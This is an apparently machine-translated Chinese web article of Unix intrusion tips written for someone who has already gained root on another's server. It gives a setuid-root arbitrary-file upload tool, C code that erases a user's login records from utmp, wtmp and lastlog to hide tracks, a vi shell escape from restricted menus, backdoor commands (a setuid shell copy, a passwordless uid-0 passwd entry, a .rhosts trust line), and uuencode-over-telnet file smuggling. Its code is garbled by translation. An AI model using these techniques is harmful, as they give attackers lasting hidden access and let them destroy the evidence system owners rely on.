Several common intrusion tips

Article title: several common intrusion tips. Linux is a technology channel of the IT lab in China. Includes basic categories such as desktop applications, Linux system management, kernel research, embedded systems, and open source.
1 UPLOAD
After the intrusion is successful, you get the root permission. this can change the access permission of his server so that anyone can upload files!
In the root state, after the Install command is run,
The upload allows the user to upload the file to any directory.
# Chmod 755 install
#./Install
$ More install
#! /Bin/csh-f
Cc upload. c
Cp a. out upload
Chown root upload
Chmod 755 upload
Chmod u + s upload
$ More upload. c
# Include
Main ()
{
Char filename [48];
Printf ("This program will upload up.txt ASCII file to specified file \ n ");
Printf ("XXX Copyright Reserved \ n ");
Printf ("Where to upload (include path and filename )? ");
Gets (filename );
Upload (filename );
}
Int upload (filename)
Char * filename;
{
FILE * fp, * outp;
Char c;
Fp = fopen ("up.txt", "r ");
Outp = fopen (filename, "w ");
If (fp = NULL ){
Printf ("file not exist .");
Return 0;
}
For (;;){
C = fgetc (fp );
If feof (fp) break;
Printf ("% c", c );
Fputc (c, outp );
}
Fclose (fp );
Fclose (outp );
Return 1;
}
　　
2 Destruction site
After entering the system, how can the site be damaged before it comes out? Erase your footprints?
　　
Edit/etc/utmp,/usr/adm/wtmp and/usr/adm/lastlog.
Please use a dedicated editor
　　
Example:
　　
# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Include
# Define WTMP_NAME "/usr/adm/wtmp"
# Define UTMP_NAME "/etc/utmp"
# Define LASTLOG_NAME "/usr/adm/lastlog"
　　
Int f;
　　
Void kill_utmp (who)
Char * who;
{
Struct utmp utmp_ent;
　　
If (f = open (UTMP_NAME, O_RDWR)> = 0 ){
While (read (f, & utmp_ent, sizeof (utmp_ent)> 0)
If (! Strncmp (utmp_ent.ut_name, who, strlen (who ))){
Bzero (char *) & utmp_ent, sizeof (utmp_ent ));
Lseek (f,-(sizeof (utmp_ent), SEEK_CUR );
Write (f, & utmp_ent, sizeof (utmp_ent ));
}
Close (f );
}
}
　　
Void kill_wtmp (who)
Char * who;
{
Struct utmp utmp_ent;
Long pos;
　　
Pos = 1L;
If (f = open (WTMP_NAME, O_RDWR)> = 0 ){
　　
While (pos! =-1L ){
Lseek (f,-(long) (sizeof (struct utmp) * pos), L_XTND );
If (read (f, & utmp_ent, sizeof (struct utmp) <0 ){
Pos =-1L;
} Else {
If (! Strncmp (utmp_ent.ut_name, who, strlen (who ))){
Bzero (char *) & utmp_ent, sizeof (struct utmp ));
Lseek (f,-(sizeof (struct utmp) * pos), L_XTND );
Write (f, & utmp_ent, sizeof (utmp_ent ));
Pos =-1L;
} Else pos + = 1L;
}
}
Close (f );
}
}
　　
Void kill_lastlog (who)
Char * who;
{
Struct passwd * pwd;
Struct lastlog newll;
　　
If (pwd = getpwnam (who ))! = NULL ){
　　
If (f = open (LASTLOG_NAME, O_RDWR)> = 0 ){
Lseek (f, (long) pwd-> pw_uid * sizeof (struct lastlog), 0 );
Bzero (char *) & newll, sizeof (newll ));
Write (f, (char *) & newll, sizeof (newll ));
Close (f );
}
　　
} Else printf ("% s :? \ N ", who );
}
　　
Main (argc, argv)
Int argc;
Char * argv [];
{
If (argc = 2 ){
Kill_lastlog (argv [1]);
Kill_wtmp (argv [1]);
Kill_utmp (argv [1]);
Printf ("Zap2! \ N ");
} Else
Printf ("Error. \ n ");
}
　　
3. SHELL breakthrough
Many methods to attack the system require the attacker to first have a command-line Shell, such as/bin/csh. However, some systems provide you with a menu-style custom Shell, such as pink. So if you want to attack this system, you must first break through this custom shell.
We can use some commands of vi (standard editor in UNIX) to achieve this goal. The specific process is as follows:
(1) select edit file in the custom Shell, then the system starts vi.
(2) in vi, enter the following command sequence: (Note: The input command includes the first ':')
: Set shell =/bin/csh
: Shell
3. at this time, just like selecting the DOS Shell menu item in the File menu of the Dos program, the system starts a Shell, which was just set to/bin/csh, therefore, we get a command-line Unix Shell.
　　
4 backdoor
It is a good habit to leave a backdoor after entering a system :) Here are some simple backdoor settings:
(1). setuid
# Cp/bin/sh/tmp/. backdoor
# Chmod u + s/tmp/. backdoor
Adding suid to shell is the easiest and most convenient.
(2). echo "wyj: 0: 0: // bin/csh">/etc/passwd
Add an account with the id 0 (root) to the system without a password.
(3). echo "+ wyj">/. rhosts
That is to say, the local user named wyj can directly rlogin target without a password. at this time, wyj is equivalent to a password, and people who do not know can't enter it. The premise is that the target port 512or513or514 opening.
　　
5. use telnet to upload files
If ftp is disabled, sendmail will not work. how can I upload the compiled file to the host?
The method is simple:
1. encode the file to be uploaded with uuedcode. the file will look like the following:
Begin 644 file. bat
M. C! J95 @ T92TP, # 503U! =: % = E6 #5D9%!>, 2Q & 1D9 & 1C $ L1D9 &, 2PT4%] J
M95 @ T85! 9 + 7 @ M04 % 28 #! @ * CTP, '500d]) 04%! 049 + 04] "4 $ E $34-" 04Q % 04I-
M3D-"2D %, 24%! 14U-3D-"1D5 '24 = & 0 T % 3D =" 1T1 (0 T = 02 $ = '2da #2 $9 (1 $ -!
M1TI (1 $ -! 1T1 '4 $ =. 1ti' 3 T = (0 T % #3 T-/0 T] #3 T-/0 T]! 3D % + 0T5! 07% Q <7 $ @
M "D! % 0TA/($] & 1B '* 0 T] 062 'E, "Y" 050 @ + T (@ 0SI <0D % 45DE2 + D-/32 'o0b' O
E62 '* 0SI <0D % 45DE2 + D-/32' * 1 $5, ($, Z7 $ )! 5% 9) 4BY # 3TT @"@''
'
End
Sum-r/size 17903/262
All are visible ASCII characters.
2. connect to the host using TELNET and enter
$ Cat>
Use WINODWS to copy/paste the file to the telnet window.
Press ^ d
Generate file a in the current directory
3. uudecode
Restore the file, and then run chmod.